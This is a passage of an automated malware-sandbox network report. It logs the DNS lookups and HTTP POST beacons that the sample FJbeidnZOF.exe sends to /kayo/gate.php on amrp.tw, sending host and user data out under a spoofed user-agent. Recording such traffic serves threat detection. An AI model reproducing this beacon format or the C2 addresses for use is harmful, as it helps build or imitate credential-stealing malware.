Apr 29, 2021 09:20:13.507350922 CEST | 192.168.2.3 | 8.8.8.8 | 0xa5ed | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:15.456970930 CEST | 192.168.2.3 | 8.8.8.8 | 0x5a42 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:16.708456039 CEST | 192.168.2.3 | 8.8.8.8 | 0x1418 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:17.914839029 CEST | 192.168.2.3 | 8.8.8.8 | 0xf989 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:19.668833971 CEST | 192.168.2.3 | 8.8.8.8 | 0x8bd5 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:20.892060041 CEST | 192.168.2.3 | 8.8.8.8 | 0x25ab | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:22.123450994 CEST | 192.168.2.3 | 8.8.8.8 | 0xe3c | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:23.567308903 CEST | 192.168.2.3 | 8.8.8.8 | 0xf6b3 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:24.787410021 CEST | 192.168.2.3 | 8.8.8.8 | 0x151a | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:26.005192995 CEST | 192.168.2.3 | 8.8.8.8 | 0xc0b8 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:27.231012106 CEST | 192.168.2.3 | 8.8.8.8 | 0x9e8e | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:28.440010071 CEST | 192.168.2.3 | 8.8.8.8 | 0x22be | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:29.635910988 CEST | 192.168.2.3 | 8.8.8.8 | 0xda47 | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:30.821522951 CEST | 192.168.2.3 | 8.8.8.8 | 0x2f7a | Standard query (0) | amrp.tw | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 29, 2021 09:18:44.239553928 CEST | 8.8.8.8 | 192.168.2.3 | 0x2b69 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:18:45.561718941 CEST | 8.8.8.8 | 192.168.2.3 | 0x8e1c | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:18:46.687691927 CEST | 8.8.8.8 | 192.168.2.3 | 0x4fc8 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:18:48.282706022 CEST | 8.8.8.8 | 192.168.2.3 | 0xcd34 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:18:49.588376045 CEST | 8.8.8.8 | 192.168.2.3 | 0x480d | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:18:50.812793970 CEST | 8.8.8.8 | 192.168.2.3 | 0x1402 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:18:52.081583977 CEST | 8.8.8.8 | 192.168.2.3 | 0x6b96 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:18:53.318711996 CEST | 8.8.8.8 | 192.168.2.3 | 0xd84f | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:18:54.767065048 CEST | 8.8.8.8 | 192.168.2.3 | 0x5926 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:18:56.004842997 CEST | 8.8.8.8 | 192.168.2.3 | 0x22a2 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:18:57.235091925 CEST | 8.8.8.8 | 192.168.2.3 | 0xfa8f | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:18:58.484735966 CEST | 8.8.8.8 | 192.168.2.3 | 0xa774 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:18:59.771270990 CEST | 8.8.8.8 | 192.168.2.3 | 0x61cc | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:01.145457029 CEST | 8.8.8.8 | 192.168.2.3 | 0x9a4c | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:02.479594946 CEST | 8.8.8.8 | 192.168.2.3 | 0x43c6 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:04.152384043 CEST | 8.8.8.8 | 192.168.2.3 | 0xfe5a | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:05.409497023 CEST | 8.8.8.8 | 192.168.2.3 | 0x17f9 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:06.837114096 CEST | 8.8.8.8 | 192.168.2.3 | 0x2a1e | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:08.379918098 CEST | 8.8.8.8 | 192.168.2.3 | 0xccaa | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:09.595403910 CEST | 8.8.8.8 | 192.168.2.3 | 0xc64c | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:11.014369965 CEST | 8.8.8.8 | 192.168.2.3 | 0x68e0 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:12.231287003 CEST | 8.8.8.8 | 192.168.2.3 | 0x2876 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:13.730776072 CEST | 8.8.8.8 | 192.168.2.3 | 0xce16 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:15.018480062 CEST | 8.8.8.8 | 192.168.2.3 | 0x29d3 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:16.796936035 CEST | 8.8.8.8 | 192.168.2.3 | 0xafac | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:18.092744112 CEST | 8.8.8.8 | 192.168.2.3 | 0x6b8 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:19.426115036 CEST | 8.8.8.8 | 192.168.2.3 | 0x13c4 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:21.933243036 CEST | 8.8.8.8 | 192.168.2.3 | 0x9871 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:23.227627039 CEST | 8.8.8.8 | 192.168.2.3 | 0x7b23 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:24.459515095 CEST | 8.8.8.8 | 192.168.2.3 | 0x78b1 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:25.684412956 CEST | 8.8.8.8 | 192.168.2.3 | 0xf5e4 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:26.919786930 CEST | 8.8.8.8 | 192.168.2.3 | 0x52be | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:28.144623995 CEST | 8.8.8.8 | 192.168.2.3 | 0xa4f5 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:29.400669098 CEST | 8.8.8.8 | 192.168.2.3 | 0x4bc1 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:30.643527031 CEST | 8.8.8.8 | 192.168.2.3 | 0xd129 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:31.950686932 CEST | 8.8.8.8 | 192.168.2.3 | 0xdc08 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:33.343103886 CEST | 8.8.8.8 | 192.168.2.3 | 0xa855 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:34.888900995 CEST | 8.8.8.8 | 192.168.2.3 | 0x61c5 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:36.164630890 CEST | 8.8.8.8 | 192.168.2.3 | 0x5df7 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:37.556483030 CEST | 8.8.8.8 | 192.168.2.3 | 0xb5db | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:38.812598944 CEST | 8.8.8.8 | 192.168.2.3 | 0xb1 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:40.082376003 CEST | 8.8.8.8 | 192.168.2.3 | 0xa5e3 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:41.539858103 CEST | 8.8.8.8 | 192.168.2.3 | 0x2888 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:42.752437115 CEST | 8.8.8.8 | 192.168.2.3 | 0xd791 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:44.017335892 CEST | 8.8.8.8 | 192.168.2.3 | 0x1901 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:45.234781027 CEST | 8.8.8.8 | 192.168.2.3 | 0x447a | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:46.451890945 CEST | 8.8.8.8 | 192.168.2.3 | 0xeec3 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:47.658653975 CEST | 8.8.8.8 | 192.168.2.3 | 0x1f27 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:48.866684914 CEST | 8.8.8.8 | 192.168.2.3 | 0xed14 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:50.082341909 CEST | 8.8.8.8 | 192.168.2.3 | 0xe8ca | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:51.312139988 CEST | 8.8.8.8 | 192.168.2.3 | 0xf569 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:52.719798088 CEST | 8.8.8.8 | 192.168.2.3 | 0xd945 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:54.116540909 CEST | 8.8.8.8 | 192.168.2.3 | 0xfafa | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:56.242844105 CEST | 8.8.8.8 | 192.168.2.3 | 0xd452 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:57.469484091 CEST | 8.8.8.8 | 192.168.2.3 | 0x13f0 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:58.686525106 CEST | 8.8.8.8 | 192.168.2.3 | 0xf5a2 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:19:59.962209940 CEST | 8.8.8.8 | 192.168.2.3 | 0x7159 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:01.195081949 CEST | 8.8.8.8 | 192.168.2.3 | 0x4a53 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:02.389657974 CEST | 8.8.8.8 | 192.168.2.3 | 0xe7dc | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:03.590300083 CEST | 8.8.8.8 | 192.168.2.3 | 0xa455 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:04.811296940 CEST | 8.8.8.8 | 192.168.2.3 | 0xfc3a | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:06.004157066 CEST | 8.8.8.8 | 192.168.2.3 | 0xfe32 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:07.429529905 CEST | 8.8.8.8 | 192.168.2.3 | 0x512 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:08.622603893 CEST | 8.8.8.8 | 192.168.2.3 | 0xddeb | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:09.824177027 CEST | 8.8.8.8 | 192.168.2.3 | 0xa236 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:11.075330019 CEST | 8.8.8.8 | 192.168.2.3 | 0x55f2 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:12.299365997 CEST | 8.8.8.8 | 192.168.2.3 | 0x9cec | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:13.556083918 CEST | 8.8.8.8 | 192.168.2.3 | 0xa5ed | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:15.505681992 CEST | 8.8.8.8 | 192.168.2.3 | 0x5a42 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:16.760174990 CEST | 8.8.8.8 | 192.168.2.3 | 0x1418 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:17.972099066 CEST | 8.8.8.8 | 192.168.2.3 | 0xf989 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:19.717551947 CEST | 8.8.8.8 | 192.168.2.3 | 0x8bd5 | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
Apr 29, 2021 09:20:20.940669060 CEST | 8.8.8.8 | 192.168.2.3 | 0x25ab | No error (0) | amrp.tw |  | 35.247.234.230 | A (IP address) | IN (0x0001)
                                            Apr 29, 2021 09:20:22.172164917 CEST8.8.8.8192.168.2.30xe3cNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:23.616051912 CEST8.8.8.8192.168.2.30xf6b3No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:24.835859060 CEST8.8.8.8192.168.2.30x151aNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:26.056761026 CEST8.8.8.8192.168.2.30xc0b8No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:27.280750036 CEST8.8.8.8192.168.2.30x9e8eNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:28.491605997 CEST8.8.8.8192.168.2.30x22beNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:29.685062885 CEST8.8.8.8192.168.2.30xda47No error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)
                                            Apr 29, 2021 09:20:30.883424997 CEST8.8.8.8192.168.2.30x2f7aNo error (0)amrp.tw35.247.234.230A (IP address)IN (0x0001)

HTTP Request Dependency Graph

• amrp.tw

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49721 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:18:44.502475977 CEST | 1120 | OUT | POST /kayo/gate.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: amrp.tw
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: FC7C64DA
Content-Length: 190
Connection: close
Apr 29, 2021 09:18:44.757561922 CEST | 1125 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: 'ckav.ruhardz141700DESKTOP-716T771k08F9C4E9C79A3B52B3F739430m2vo9
Apr 29, 2021 09:18:45.282027006 CEST | 1132 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 29 Apr 2021 07:18:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49723 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:18:45.816121101 CEST | 1135 | OUT | POST /kayo/gate.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: amrp.tw
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: FC7C64DA
Content-Length: 190
Connection: close
Apr 29, 2021 09:18:46.066150904 CEST | 1142 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: 'ckav.ruhardz141700DESKTOP-716T771+08F9C4E9C79A3B52B3F7394305FgqE
Apr 29, 2021 09:18:46.533708096 CEST | 1148 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 29 Apr 2021 07:18:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.3 | 49739 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:18:57.489684105 CEST | 1232 | OUT | POST /kayo/gate.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: amrp.tw
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: FC7C64DA
Content-Length: 163
Connection: close
Apr 29, 2021 09:18:57.738857985 CEST | 1233 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:18:58.212582111 CEST | 1233 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 29 Apr 2021 07:18:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.3 | 49740 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:18:58.739295959 CEST | 1234 | OUT | POST /kayo/gate.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: amrp.tw
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: FC7C64DA
Content-Length: 163
Connection: close
Apr 29, 2021 09:18:58.988575935 CEST | 1234 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:18:59.492105007 CEST | 1234 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 29 Apr 2021 07:18:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.3 | 49741 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:00.024704933 CEST | 1235 | OUT | POST /kayo/gate.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: amrp.tw
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: FC7C64DA
Content-Length: 163
Connection: close
Apr 29, 2021 09:19:00.273252964 CEST | 1235 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:00.742952108 CEST | 1236 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 29 Apr 2021 07:19:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.3 | 49742 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:01.421406031 CEST | 1236 | OUT | POST /kayo/gate.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: amrp.tw
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: FC7C64DA
Content-Length: 163
Connection: close
Apr 29, 2021 09:19:01.666986942 CEST | 1237 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:02.138453007 CEST | 1237 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 29 Apr 2021 07:19:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
14 | 192.168.2.3 | 49743 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:03.174503088 CEST | 1238 | OUT | POST /kayo/gate.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: amrp.tw
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: FC7C64DA
Content-Length: 163
Connection: close
Apr 29, 2021 09:19:03.420962095 CEST | 1238 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:03.889556885 CEST | 1238 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 29 Apr 2021 07:19:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.2.3 | 49744 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:04.404731989 CEST | 1239 | OUT | POST /kayo/gate.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: amrp.tw
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: FC7C64DA
Content-Length: 163
Connection: close
Apr 29, 2021 09:19:04.651185036 CEST | 1239 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Apr 29, 2021 09:19:05.126091003 CEST | 1240 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 29 Apr 2021 07:19:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
16 | 192.168.2.3 | 49745 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
Timestamp | kBytes transferred | Direction | Data
Apr 29, 2021 09:19:05.661257029 CEST | 1240 | OUT | POST /kayo/gate.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: amrp.tw
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: FC7C64DA
Content-Length: 163
Connection: close
Apr 29, 2021 09:19:05.906627893 CEST | 1241 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
